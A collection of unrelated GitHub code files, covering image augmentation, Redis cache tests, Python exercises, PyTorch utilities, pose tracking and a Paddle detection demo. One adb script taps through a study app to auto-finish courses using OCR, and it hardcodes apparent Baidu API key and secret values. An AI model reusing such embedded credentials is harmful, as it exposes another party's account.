self.scale_and_translate * 1\n + self.color * 1\n )\n\n def _get_channel_shuffle(self) -> augmenters.Augmenter:\n # Shuffle channels in 15% of all images\n if self.channel_shuffle:\n return augmenters.ChannelShuffle(0.15)\n return augmenters.Identity()\n\n def _get_brightness(self) -> augmenters.Augmenter:\n # Changes brightnes\n if self.brightness:\n return augmenters.Add((-70, 70))\n return augmenters.Identity()\n\n def _get_gaussian_noise(self) -> augmenters.Augmenter:\n # Makes image slightly more noisy\n if self.gaussian_noise:\n return augmenters.ChannelShuffle(0.17)\n return augmenters.Identity()\n\n def _get_dropout_boxes(self) -> augmenters.Augmenter:\n # Renders small black boxes over the image, blocking 5% of the image\n if self.dropout_boxes:\n return augmenters.CoarseDropout(0.05, size_percent=7)\n return augmenters.Identity()\n\n def _get_salt_and_pepper(self) -> augmenters.Augmenter:\n # Replaces 4% of all pixels with salt and pepper noise\n if self.salt_and_pepper:\n return augmenters.SaltAndPepper(0.04)\n return augmenters.Identity()\n\n def _get_jpeg_artifacts(self) -> augmenters.Augmenter:\n # Adds JPEG compression arrifacts\n if self.jpeg_artifacts:\n return augmenters.JpegCompression(compression=(80, 95))\n return augmenters.Identity()\n\n def _get_vertical_flip(self) -> augmenters.Augmenter:\n # Flip vertically by a change of 35%\n if self.vertical_flip:\n return augmenters.Fliplr(0.35)\n return augmenters.Identity()\n\n def _get_distortion(self) -> augmenters.Augmenter:\n # Slight distortion\n if self.distortion:\n return augmenters.PiecewiseAffine(scale=(0.0, 0.04))\n return augmenters.Identity()\n\n def _get_scale_and_translate(self) -> augmenters.Augmenter:\n # First scale, then shift the image\n translation_percent = 0.2\n if self.scale_and_translate:\n return augmenters.Affine(\n scale=(0.7, 1.4),\n translate_percent={\n \"x\": (-translation_percent, translation_percent),\n \"y\": (-translation_percent, translation_percent),\n },\n )\n return augmenters.Identity()\n\n def _get_rotater(self) -> augmenters.Augmenter:\n # Rotate between -35 and 35 degree\n if self.rotate:\n return augmenters.Rotate((-35, 35))\n return augmenters.Identity()\n\n def _get_color(self) -> augmenters.Augmenter:\n # Change hue and saturation by -10% to 10%\n if self.color:\n return augmenters.MultiplyHueAndSaturation(\n mul_hue=(0.85, 1.15),\n mul_saturation=(0.45, 1.55),\n )\n return augmenters.Identity()\n\n def get_augmenter(self) -> augmenters.Augmenter:\n \"\"\"Compile an augmenter to augment images or batches of images.\"\"\"\n if self.activated_count() == 0:\n return augmenters.Identity()\n\n chance_of_augmentation_to_be_applied = 6 / self.activated_count()\n if chance_of_augmentation_to_be_applied > 1:\n chance_of_augmentation_to_be_applied = 1\n\n augmentations = [\n self._get_channel_shuffle(),\n self._get_brightness(),\n self._get_gaussian_noise(),\n self._get_dropout_boxes(),\n self._get_salt_and_pepper(),\n self._get_jpeg_artifacts(),\n self._get_vertical_flip(),\n self._get_distortion(),\n self._get_scale_and_translate(),\n self._get_rotater(),\n self._get_color(),\n ]\n\n augmentations = [\n aug\n for aug in augmentations\n if not isinstance(aug, augmenters.Identity)\n ]\n\n return augmenters.SomeOf((3, 6), augmentations)\n","repo_name":"DennisNemec/school-nn","sub_path":"schoolnn/models/augmentation_options.py","file_name":"augmentation_options.py","file_ext":"py","file_size_in_byte":6013,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"19938032831","text":"import redis\nimport json\nimport pytest\n\nfrom smache.stores.redis_store import RedisStore\nfrom smache.timestamp_registry import TimestampRegistry\n\nredis_con = redis.StrictRedis(host='localhost', port=6379, db=0)\n\n\n@pytest.yield_fixture(autouse=True)\ndef flush_before_each_test_case():\n redis_con.flushall()\n yield\n\n\n@pytest.yield_fixture\ndef redis_store():\n yield RedisStore(redis_con, TimestampRegistry(redis_con))\n\n\ndef test_stored_elements_can_be_looked_up(redis_store):\n redis_store.store(\"hello\", \"world\", 0)\n\n stored_element = redis_store.lookup(\"hello\")\n\n assert stored_element.value == \"world\"\n\n\ndef test_newly_stored_elements_are_fresh(redis_store):\n redis_store.store(\"hello\", \"world\", 0)\n\n assert redis_store.is_fresh(\"hello\") == True\n\n\ndef test_key_marked_as_stale_is_not_fresh(redis_store):\n redis_store.store(\"hello\", \"world\", 0)\n\n assert redis_store.is_fresh(\"hello\") == True\n\n redis_store.mark_as_stale(\"hello\")\n\n assert redis_store.is_fresh(\"hello\") == False\n\n\ndef test_all_keys_of_namespace_are_marked_as_stale(redis_store):\n key1 = \"namespace:key\"\n key2 = \"other_namespace:key\"\n redis_store.store(key1, \"coolio\", 0)\n redis_store.store(key2, \"coolio\", 0)\n\n assert redis_store.is_fresh(key1)\n assert redis_store.is_fresh(key2)\n\n redis_store.mark_all_as_stale(\"namespace\")\n\n assert redis_store.is_fresh(key1) == False\n assert redis_store.is_fresh(key2)\n\n\ndef test_value_is_only_written_when_newer_then_current(redis_store):\n registry = TimestampRegistry(redis_con)\n redis_store = RedisStore(redis_con, registry)\n\n redis_store.store(\"hello\", \"world\", 0)\n\n assert redis_store.lookup(\"hello\").value == \"world\"\n\n registry.increment_state_timestamp(\"hello\")\n\n redis_store.store(\"hello\", \"new_world\", 0)\n\n assert redis_store.lookup(\"hello\").value == \"world\"\n\n redis_store.store(\"hello\", \"new_world\", 1)\n\n assert redis_store.lookup(\"hello\").value == \"new_world\"\n\n\n# This test is really NOT a good practice. It tests \"private methods\"\n# But it tests that we retry transactions and\ndef test_retry_method_works_with_cache_overwrite(monkeypatch):\n redis_store = RedisStore(\n redis_con,\n TimestampRegistry(redis_con),\n retry_backoff=lambda: 0\n )\n global retries\n retries = 0\n\n def test_cache_update(cache_entry, pipe):\n global retries\n retries += 1\n redis_con.hset(cache_entry.key, \"random_key\", \"random_value\")\n\n pipe.multi()\n pipe.hset(cache_entry.key, \"value\", json.dumps(cache_entry.value))\n pipe.execute()\n\n monkeypatch.setattr(redis_store, '_update_cache_entry', test_cache_update)\n redis_store.store(\"hello\", \"world\", 0)\n\n assert redis_store.lookup(\"hello\").value is None\n assert retries == 5\n\n\ndef test_retry_method_works_with_timestamp_overwrite(monkeypatch):\n ts_registry = TimestampRegistry(redis_con)\n redis_store = RedisStore(redis_con, ts_registry, retry_backoff=lambda: 0)\n global retries\n retries = 0\n\n def test_cache_update(cache_entry, pipe):\n global retries\n retries += 1\n ts_key = ts_registry.value_ts_key(cache_entry.key)\n redis_con.set(ts_key, -500)\n\n pipe.multi()\n pipe.set(ts_key, 5)\n pipe.execute()\n\n monkeypatch.setattr(redis_store, '_update_cache_entry', test_cache_update)\n redis_store.store(\"hello\", \"world\", 0)\n\n assert redis_store.lookup(\"hello\").value is None\n assert retries == 5\n","repo_name":"anderslime/smache","sub_path":"tests/smache/stores/test_redis_store.py","file_name":"test_redis_store.py","file_ext":"py","file_size_in_byte":3472,"program_lang":"python","lang":"it","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"71455346932","text":"# LOOPING THROUGH ALL THE KEYS IN A DICTIONARY\n\n# The keys() method is useful when you don't need to work with all of the values in a dictionary. Let's loop through the 'favorite_languages' dictionary and print the names of everyone who took the poll:\n\nfavorite_languages = {\n 'jen': 'python',\n 'sarah': 'c',\n 'edward': 'ruby',\n 'phil': 'python',\n}\n\nfor name in favorite_languages.keys():\n print(name.title())\n\n# Looping through keys is actually the default behavior when looping throuhg a dictionary, so this code would have exactly the same output if you wrote:\n\nfor name in favorite_languages:\n print(name.title())\n\n# You can choose to use the keys() method explicitly if it makes your code easier to read, or you can omit it if you wish.\n\n# You can access the value associated with an key you care about inside the loop by using the current key. Let's print a message to a couple of friends about the languages they chose. We'll loop through the names in the dictionary as we did previously, but when the name matches one of our friends, we'll display a message about their favorite language:\n\nfriends = ['phil', 'sarah']\nfor name in favorite_languages.keys():\n print(f\"Hi {name.title()}.\")\n\n if name in friends:\n language = favorite_languages[name].title()\n print(f\"\\t{name.title()}, I see you love {language}!\")\n\n# At line 24 we make a list of friends that we want to print a message to. Inside the loop, we print each person's name. Then at line 28 we check whether the 'name' we're working with is in the list of 'friends'. If it is, we determine the person's favorite language using the name of the dictionary and the current value of 'name' as the key (line 29). We then print a special greeting, including a reference to their language of choice.\n\n# Everyone's name should be printed, but our friends receive a special message.\n\n# You can also use the keys() method to find out if a particular person was polled. This time, let's find out if Erin took the poll:\n\nif 'erin' not in favorite_languages.keys():\n print(\"\\nErin, please take our poll!\")","repo_name":"ctrlshftejct/pythoncc","sub_path":"2020/part1-basics/06_dictionaries/looping through a dictionary/looping_through_all_keys_in_dictionary.py","file_name":"looping_through_all_keys_in_dictionary.py","file_ext":"py","file_size_in_byte":2072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10940278734","text":"#!/bin/env python\n\nfrom argparse import ArgumentParser\n\nfrom ebi_eva_common_pyutils.logger import logging_config\n\nfrom contig_name_converter.convert_vcf_file import convert_vcf\nfrom contig_name_converter.converters import supported_conventions\n\nlogger = logging_config.get_logger(__name__)\n\n\ndef main():\n argparse = ArgumentParser(description=\"Convert sequence/contig names from a naming convention to another using \"\n \"stored in the accession provided in the header\")\n argparse.add_argument('-i', '--input', help='Input file to convert')\n argparse.add_argument('-o', '--output', help='Output file containing the converted data')\n argparse.add_argument('-c', '--convention', help='Contig naming convention to use',\n choices=supported_conventions,\n default='enaSequenceName')\n argparse.add_argument('-u', '--contig_alias_url', help='URL used to contact the contig alias web service',\n default='https://www.ebi.ac.uk/eva/webservices/contig-alias/')\n\n args = argparse.parse_args()\n logging_config.add_stdout_handler()\n\n convert_vcf(args.input, args.output, target_naming_convention=args.convention,\n contig_alias_url=args.contig_alias_url)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"EBIvariation/contig-name-converter","sub_path":"bin/convert_vcf_file.py","file_name":"convert_vcf_file.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"856894607","text":"import torch\nimport numpy as np\nimport torch.nn.functional as F\nimport torchvision\n\nfrom typing import Union, Tuple\n\ndef to_tensor(data: np.ndarray) -> torch.Tensor:\n \"\"\"\n Convert numpy array to PyTorch tensor.\n\n For complex arrays, the real and imaginary parts are stacked along the last\n dimension.\n\n Args:\n data: Input numpy array.\n\n Returns:\n PyTorch version of data.\n \"\"\"\n if np.iscomplexobj(data):\n data = np.stack((data.real, data.imag), axis=-1)\n\n return torch.from_numpy(data)\n\ndef normalize(\n data: torch.Tensor,\n mean: Union[float, torch.Tensor],\n stddev: Union[float, torch.Tensor],\n eps: Union[float, torch.Tensor] = 0.0,\n) -> torch.Tensor:\n \"\"\"\n Normalize the given tensor.\n\n Applies the formula (data - mean) / (stddev + eps).\n\n Args:\n data: Input data to be normalized.\n mean: Mean value.\n stddev: Standard deviation.\n eps: Added to stddev to prevent dividing by zero.\n\n Returns:\n Normalized tensor.\n \"\"\"\n return (data - mean) / (stddev + eps)\n\ndef normalize_instance(\n data: torch.Tensor, eps: Union[float, torch.Tensor] = 0.0\n) -> Tuple[torch.Tensor, torch.Tensor, torch.Tensor]:\n \"\"\"\n Normalize the given tensor with instance norm/\n\n Applies the formula (data - mean) / (stddev + eps), where mean and stddev\n are computed from the data itself.\n\n Args:\n data: Input data to be normalized\n eps: Added to stddev to prevent dividing by zero.\n\n Returns:\n torch.Tensor: Normalized tensor\n \"\"\"\n mean = data.mean()\n std = data.std()\n\n return normalize(data, mean, std, eps), mean, std\n\ndef pad_size_tensor(data: torch.Tensor, mask: torch.Tensor, desired_shape: Tuple[int, int]= (512, 256)): \n # shape: [batch, width, height, t, channels]\n w_, h_ = desired_shape #desired shapes\n h, w = data.shape[-3], data.shape[-4] #actual original shapes #TODO dims -3 and -4\n h_pad, w_pad = (h_-h), (w_-w)\n \n if data.dim() == 4:\n pad = (0, 0,\n 0, 0,\n h_pad//2, h_pad//2,\n w_pad//2, w_pad//2\n ) \n elif data.dim() == 5:\n pad = (0, 0,\n 0, 0,\n 0, 0,\n h_pad // 2, h_pad // 2,\n w_pad // 2, w_pad // 2,\n )\n\n pad_4_mask = (0, 0,\n h_pad // 2, h_pad // 2,\n w_pad // 2, w_pad // 2,\n \n )\n \n data_padded = F.pad(data, pad, mode='constant', value=0)\n mask_padded = F.pad(mask, pad_4_mask, mode='constant', value=0)\n \n # print(\"pad_size_tensor data_padded: \", data_padded.size())\n # print(\"pad_size_tensor mask_padded: \", mask_padded.size())\n \n return data_padded, mask_padded\n\ndef crop_to_depad(data, metadata):\n \n ori_height, ori_width = metadata['height'], metadata['width'] \n # print(ori_height, ori_width)\n data = data.permute(0, 3, 4, 2, 1)\n w_crop = (data.shape[-1] - ori_width) // 2\n h_crop = (data.shape[-2] - ori_height) // 2\n \n data = torchvision.transforms.functional.crop(data, h_crop, w_crop, ori_height, ori_width) \n\n return data.permute(0, 4, 3, 1, 2)\n\ndef new_crop(data, metadata):\n ori_height, ori_width = metadata['height'], metadata['width']\n data = data.permute(0, 1, 3, 2)\n w_crop = (data.shape[-1] - ori_width) // 2\n h_crop = (data.shape[-2] - ori_height) // 2\n\n data = torchvision.transforms.functional.crop(data, h_crop, w_crop, ori_height, ori_width)\n\n return data.permute(0, 1, 3, 2)\n","repo_name":"vios-s/CMRxRECON_Challenge_EDIPO","sub_path":"data/transform_utils.py","file_name":"transform_utils.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"5384815581","text":"# coding=utf-8\nimport os\nimport time\nimport recognition\nfrom PIL import Image\n\n# 获取access_token\nAPI_Key = \"NXWqI8Qr0IuCMXneOGTTeAw1\"\nSecret_Key = \"HPjcoprSjTaFlHDrZp5sel8NuXcjfra4\"\naccess_token = recognition.get_token(API_Key, Secret_Key)\n\n# 0:十九大报告,1:四个全面,2:中国梦,3:青年工作,4:故事典故\nnum = input('please select the topic:')\nif num == '':\n raise RuntimeError('num is Error!')\nnum = int(num)\n\nstart = input('please enter the start class:')\nif start == '':\n raise RuntimeError('start is Error!')\nstart = int(start)\n\ndef shuati():\n os.system('adb shell screencap /sdcard/sc.png')\n os.system('adb pull /sdcard/sc.png')\n\n img = Image.open('sc.png')\n\n # 裁剪出按钮并判断按钮内容是否为下一个\n next = img.crop((360, 1660, 720, 1780))\n next.save('next.png')\n next = recognition.recognition_word_high(r'./', 'next.png', access_token)\n for i in next:\n if i == '下一个':\n os.system('adb shell input tap 538 1708')\n print('正在刷课...')\n time.sleep(6)\n shuati()\n break\n elif i == '继续学习':\n os.system('adb shell input tap 856 811')\n os.system('adb shell input tap 538 1708')\n time.sleep(5)\n position()\n elif i == '典故0':\n print('典故')\n topic()\n else :\n print(i)\n time.sleep(5)\n backToTopic()\n\n# 自动点击topic\ndef topic():\n global num\n startX = 250\n startY = 1410\n addX = 300\n addY = 255\n lastX = startX + num % 3 * addX\n lastY = startY + int(num/3) * addY\n os.system('adb shell input tap ' + str(lastX) + ' ' + str(lastY))\n time.sleep(3)\n if num<5:\n num = num + 1\n position()\n else :\n print('刷课完毕!')\n\n# 自动点击第几课\ndef position():\n global start\n startX = 242\n startY = 633\n add = 118\n lastX = startX + (start-1) % 6 * add\n lastY = startY + int((start-1) / 6) * add\n os.system('adb shell input tap ' + str(lastX) + ' ' + str(lastY))\n start = start + 1\n time.sleep(3)\n shuati()\n\n#刷完回到Topic界面\ndef backToTopic():\n img = Image.open('sc.png')\n back = img.crop((670, 1700, 980, 1790))\n back.save('back.png')\n back = recognition.recognition_word_high(r'./', 'back.png', access_token)\n for i in back:\n if i == '返回':\n print(i)\n check1 = img.crop((530, 1075, 680, 1160))\n check1.save('check1.png')\n check1 = recognition.recognition_word_high(r'./', 'check1.png', access_token)\n check2 = img.crop((770, 1090, 860, 1140))\n check2.save('check2.png')\n check2 = recognition.recognition_word_high(r'./', 'check2.png', access_token)\n print(check1)\n print(check2)\n for check in check1:\n if check=='确定':\n os.system('adb shell input tap 600 1080')\n for check in check2:\n if check=='确定':\n os.system('adb shell input tap 800 1120')\n os.system('adb shell input tap 832 1740')\n time.sleep(2)\n global start\n start = start - 4\n topic()\n else:\n shuati()\n \ntopic()\ntime.sleep(6)\nshuati()\n","repo_name":"ZJia1231/Demo","sub_path":"py/adb/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27211733734","text":"class TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nfrom collections import deque\nclass Solution:\n def minDepth(self, root: TreeNode) -> int:\n if not root:\n return 0\n \n q = deque([(root, 1)])\n\n while q:\n temp_size = len(q)\n for _ in range(temp_size):\n cur, depth = q.popleft()\n if not cur.left and not cur.right: return depth\n if cur.left: q.append((cur.left, depth+1))\n if cur.right: q.append((cur.right, depth+1))\n\n\nif __name__ == \"__main__\":\n sln = Solution()\n print(sln.minDepth(TreeNode())); ","repo_name":"Loycine/algorithm-practice","sub_path":"contest/leetcode/bfs/111.py","file_name":"111.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17083181737","text":"import pytest\nimport atm\n\n\ndef test_should_not_access_pin_number():\n card = atm.Card()\n with pytest.raises(AttributeError):\n card.__pin_number\n\n\ndef test_correct_card_check_pin_number():\n card = atm.Card()\n assert card.check_pin(1234) == True\n\n\ndef test_wrong_card_check_pin_number():\n card = atm.Card()\n assert card.check_pin(1235) == False\n\n\ndef test_should_get_account_number_by_card():\n # Given\n account = atm.Account()\n account.set_account(1)\n card = atm.Card()\n card.connect_account(account)\n\n # When\n accounts = card.get_account_numbers()\n\n # Then\n assert accounts[0] == 1\n\n\ndef test_should_get_account_number_by_atm():\n # Given\n a = atm.Atm()\n card = atm.Card()\n a.insert_card(card)\n\n # When\n accounts = a.get_account_number(1234)\n\n # Then\n assert accounts[0] == 1\n\n\ndef test_should_select_account_using_card():\n # Given\n a = atm.Atm()\n card = atm.Card()\n a.insert_card(card)\n\n # When\n account = a.select_account(1)\n\n # Then\n assert account == 1\n\n\ndef test_connect_valid_account():\n account = atm.Account()\n card = atm.Card()\n card.connect_account(account)\n\n\ndef test_connect_invalid_account():\n account = atm.Atm()\n card = atm.Card()\n with pytest.raises(Exception):\n card.connect_account(account)\n\n\ndef test_open_account_with_no_balance():\n account = atm.Account()\n assert account.get_balance() == 0\n\n\ndef test_insert_valid_card():\n card = atm.Card()\n a = atm.Atm()\n a.insert_card(card)\n\n\ndef test_insert_invalid_card():\n account = atm.Account()\n a = atm.Atm()\n with pytest.raises(Exception):\n a.insert_card(account)\n\n\ndef test_intput_correct_pin():\n card = atm.Card()\n a = atm.Atm()\n a.insert_card(card)\n\n assert a.input_pin(1234) == True\n\n\ndef test_see_balance():\n\n card = atm.Card()\n a = atm.Atm()\n a.insert_card(card)\n\n assert a.see_balance(1234, 1) == 0\n\n\ndef test_can_deposit_by_atm():\n # Given\n card = atm.Card()\n a = atm.Atm()\n a.insert_card(card)\n\n # When\n a.deposit(1234,1, 100)\n\n # Then\n assert a.see_balance(1234, 1) == 100\n\n\ndef test_can_withdraw_by_atm():\n # Given\n card = atm.Card()\n a = atm.Atm()\n a.insert_card(card)\n a.deposit(1234,1, 100)\n\n # When\n a.withdraw(1234, 1, 100)\n\n # Then\n assert a.see_balance(1234, 1) == 0\n","repo_name":"yvd0301/atm","sub_path":"test_atm.py","file_name":"test_atm.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27896319997","text":"import json\nimport pprint\nimport os\nimport sys\nimport stat\nimport pathlib\nimport suit.utils as utils\nimport math\nimport shutil\nimport pkg_resources\nimport argparse\n\ndef aices2_anynode():\n code = \"#SBATCH -A aices2\\n\"\n code += \"#SBATCH --cores-per-socket={cores_per_socket}\\n\"\n code += \"#SBATCH --exclusive\\n\"\n return code\n\ndef linuxihdc072():\n code = \"#SBATCH -A aices2\\n\"\n code += \"#SBATCH --nodelist=linuxihdc072\\n\"\n code += \"#SBATCH --exclusive\\n\"\n return code\n\n\ndef slrum_script_code(node_list,job_name,num_hours,mem,cores,commands):\n template_path = \"suit/templates/\"\n script = pkg_resources.resource_string(__name__,os.path.join(template_path,\"slrum_script.sh\")).decode(\"UTF-8\")\n\n template = {}\n template[\"node\"] = globals()[node_list]()\n template[\"job_name\"] = job_name\n template[\"memory\"] = mem\n template[\"num_hours\"] = num_hours\n template[\"cores\"] = cores\n template[\"commands\"] = commands\n\n code = script.format(**template)\n return code\n\n\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('file')\n parser.add_argument('--slrum',dest='slrum', action='store_true')\n params = parser.parse_args()\n\n isSlrum = params.slrum\n config_file = os.path.abspath(params.file)\n if not os.path.exists(config_file):\n print(\"config file does not exists\")\n exit(code=-1)\n\n with open(config_file) as f:\n ARGS = json.load(f)\n pprint.pprint(ARGS)\n\n script_file_dir = os.path.join(os.path.dirname(config_file),\"scripts\")\n if not os.path.exists(script_file_dir):\n # shutil.rmtree(script_file_dir)\n os.mkdir(script_file_dir)\n\n this_script_directory = pathlib.Path(__file__).parent.absolute()\n suit_directory = os.path.join(this_script_directory,\"suit\")\n\n\n seed = ARGS[\"seed\"]\n divide_runs = ARGS[\"divide_runs\"]\n experiments_list = ARGS[\"experiments\"]\n num_divisions = 1\n if(divide_runs > 0):\n num_divisions = math.ceil(len(experiments_list)/divide_runs)\n\n method_folder = ARGS[\"expression_id\"]\n exp_folder = utils.get_expressions_id(ARGS)\n exp_folder_base = os.path.join(\"logs\",method_folder,exp_folder)\n result_folder_name = utils.get_results_id(ARGS)\n\n gen_code = \"\"\n if not ARGS[\"reuse_expressions\"]:\n gen_code = \"python3 01_generate_test_expressions.py {}\\n\".format(config_file)\n\n for div in range(num_divisions):\n code = \"cd {}\\n\".format(suit_directory)\n if div==0:\n code += gen_code\n code += \"python3 02_generate_experiment_script.py {}\\n\".format(config_file)\n\n sd_folder = os.path.join(exp_folder_base,\"SD\"+str(div)+\"_\"+exp_folder)\n results_folder = os.path.join(sd_folder,result_folder_name)\n #print(\"Results folder : \", results_folder)\n\n code += \"cd {}\\n\".format(results_folder)\n code += \"./runner.sh\\n\"\n\n code += \"cd {}/\\n\".format(suit_directory)\n code += \"python3 03_gather_results.py {}\\n\".format(results_folder)\n #code += \"python3 04_analyse.py {}\\n\".format(results_folder)\n\n script_file = \"SD\"+str(div)+\"_measure_\"+config_file.split(\"/\")[-1].split(\".json\")[0]+\".sh\"\n if isSlrum:\n script_file = \"Sl_\"+script_file\n memory = ARGS[\"memory\"]\n num_hours = ARGS[\"num_hours\"]\n job_name = script_file\n cores = ARGS[\"num_threads\"]\n node = ARGS[\"node\"]\n code = slrum_script_code(node,job_name, num_hours, memory, cores, code)\n\n script_file = os.path.join(script_file_dir,script_file)\n #print(script_file)\n #exit(-1)\n f = open(script_file,\"w\")\n f.write(code)\n f.close()\n\n st = os.stat(script_file)\n os.chmod(script_file,st.st_mode | stat.S_IEXEC)\n","repo_name":"as641651/Relative-Performance","sub_path":"measurements/generate_measurement_script.py","file_name":"generate_measurement_script.py","file_ext":"py","file_size_in_byte":3784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17016488394","text":"# Exercicio 01\n\nplanet = {\"name\": \"Mars\", \"moons\": 2}\n\nprint(f\"{planet.get('name')} has {planet.get('moons')} moon(s)\")\n\nplanet[\"circumferences (km)\"] = {\"polar\": 6752, \"equatorial\": 6792}\n\nprint(\n f'{planet[\"name\"]} has a polar circumference of {planet[\"circumferences (km)\"][\"polar\"]}'\n)\n\n# Exercicio 2\n\nplanet_moons = {\n \"mercury\": 0,\n \"venus\": 0,\n \"earth\": 1,\n \"mars\": 2,\n \"jupiter\": 79,\n \"saturn\": 82,\n \"uranus\": 27,\n \"neptune\": 14,\n \"pluto\": 5,\n \"haumea\": 2,\n \"makemake\": 1,\n \"eris\": 1,\n}\n\nplanet_moons.pop(\"eris\")\n\nmoons = planet_moons.values()\ntotal_planets = len(planet_moons.keys())\n\nprint(f\"There was {moons} moons. In {total_planets} planets!\")\n\ntotal_moons = 0\nfor value in planet_moons.values():\n total_moons = total_moons + value\n\naverage_moons = total_moons / total_planets\n\nprint(f\"Each planet has an average of {average_moons} moons\")\n","repo_name":"gabrielsouzas/treinamento-python","sub_path":"dicionarios/dicionarioExe.py","file_name":"dicionarioExe.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"34731959606","text":"import cv2 as cv\nimport mediapipe as mp\n\nmp_draw = mp.solutions.drawing_utils\nmp_style = mp.solutions.drawing_styles\nmp_pose = mp.solutions.pose\n\ncam = cv.VideoCapture(0)\npose = mp_pose.Pose(min_detection_confidence=0.5, min_tracking_confidence=0.5)\n\nwhile cam.isOpened():\n success, image = cam.read()\n if not success:\n continue\n image.flags.writeable = False\n image = cv.cvtColor(image, cv.COLOR_BGR2RGB)\n results = pose.process(image)\n\n image.flags.writeable = True\n image = cv.cvtColor(image, cv.COLOR_RGB2BGR)\n mp_draw.draw_landmarks(image, results.pose_landmarks, mp_pose.POSE_CONNECTIONS, landmark_drawing_spec=mp_style.get_default_pose_landmarks_style())\n cv.imshow(\"Pose Track\", cv.flip(image,1))\n if cv.waitKey(5) & 0xFF == 27:\n break\ncam.release()","repo_name":"UtkarshRastogi0712/Pose-tracking","sub_path":"Pose detection.py","file_name":"Pose detection.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4128009836","text":"import numpy as np, time\n\ndef unique1(array: []):\n\tn = len(array)\n\tfor i in range(n - 1):\n\t\tfor j in range(i + 1, n):\n\t\t\tif array[i] == array[j]: return False\n\treturn True\n\ndef unique2(array: []):\n\tn = len(array)\n\tarray.sort()\n\tfor i in range(n - 1):\n\t\tif array[i] == array[i + 1]: return False\n\treturn True\n\ndef search_largest_size(function: str, min_size: int, max_size: int, time_limit=60):\n\tsize = (min_size + max_size) // 2\n\tarray = list(np.random.randint(101, size=size))\n\tif size < max_size and min_size != max_size:\n\t\tif function == 'unique1':\n\t\t\tstart = time.time()\n\t\t\tunique1(array)\n\t\t\tend = time.time()\n\t\t\telapse = end - start\n\t\t\tprint('array size: ' + str(size) + '\\telapse time: ' + str(elapse))\n\t\telif function == 'unique2':\n\t\t\tstart = time.time()\n\t\t\tunique2(array)\n\t\t\tend = time.time()\n\t\t\telapse = end - start\n\t\t\tprint('array size: ' + str(size) + '\\telapse time: ' + str(elapse))\n\t\telse:\n\t\t\tprint('invalid function name')\n\t\t\treturn\n\t\tif abs(elapse - time_limit) < .001:\n\t\t\tdel array\n\t\t\treturn size\n\t\telif elapse < time_limit:\n\t\t\tdel array\n\t\t\treturn search_largest_size(function, size + 1, max_size, time_limit)\n\t\telif elapse > time_limit:\n\t\t\tdel array\n\t\t\treturn search_largest_size(function, min_size, size - 1, time_limit)\n\treturn size\n\n# time limit can't be set too large because it is time and memory consuming.\nsize1 = search_largest_size('unique1', 0, 100000000, 1)\nsize2 = search_largest_size('unique2', 0, 10000000000, 1)","repo_name":"tanjiarui/comp254","sub_path":"lab 2/exercise 3.py","file_name":"exercise 3.py","file_ext":"py","file_size_in_byte":1444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43351712302","text":"import os\nimport argparse\nimport numpy as np\nimport cv2\nimport paddle.fluid as fluid\nfrom paddle.fluid.core import AnalysisConfig\nfrom paddle.fluid.core import create_paddle_predictor\n\nthis_dir = os.path.split(os.path.realpath(__file__))[0]\nmodelname = \"mobilenet-ssd\"\nif modelname == \"mobilenet-ssd\":\n input_size = 300\nelse:\n input_size = 160\n\nCLASSES = { 0: 'background',\n 1: 'aeroplane', 2: 'bicycle', 3: 'bird', 4: 'boat',\n 5: 'bottle', 6: 'bus', 7: 'car', 8: 'cat', 9: 'chair',\n 10: 'cow', 11: 'diningtable', 12: 'dog', 13: 'horse',\n 14: 'motorbike', 15: 'person', 16: 'pottedplant',\n 17: 'sheep', 18: 'sofa', 19: 'train', 20: 'tvmonitor' }\n\ndef clip_bbox(bbox):\n xmin = max(min(bbox[0], 1.), 0.)\n ymin = max(min(bbox[1], 1.), 0.)\n xmax = max(min(bbox[2], 1.), 0.)\n ymax = max(min(bbox[3], 1.), 0.)\n return xmin, ymin, xmax, ymax\n\ndef preprocess(img):\n img = cv2.resize(img, (input_size, input_size)) \n if modelname == \"mobilenet-ssd\":\n img = (img - 127.5) * 0.007843\n else:\n mean = (103.94, 116.669, 123.68)\n img = img - mean\n img = img.transpose((2,0,1)).copy()\n img = np.expand_dims(img,axis=0)\n img = img.astype(\"float32\")\n image = fluid.core.PaddleTensor(img)\n return [image]\n \ndef draw_result(img, out):\n h, w, _ = img.shape\n for dt in out:\n if len(dt) < 5 or dt[1] < 0.5:\n continue\n xmin, ymin, xmax, ymax = clip_bbox(dt[2:])\n xmin=(int)(xmin*w)\n ymin=int(ymin*h)\n xmax=(int)(xmax*w)\n ymax=int(ymax*h)\n cv2.rectangle(img,(xmin,ymin),(xmax,ymax),(0,0,255))\n if ymin<20:\n ymin=20\n cv2.putText(img,CLASSES[int(dt[0])],(xmin,ymin),3,1,(255,0,0))\n cv2.imshow(\"img\",img)\n cv2.waitKey(1)\n\ndef test_image(predictor, imgpath):\n img = cv2.imread(imgpath)\n inputs = 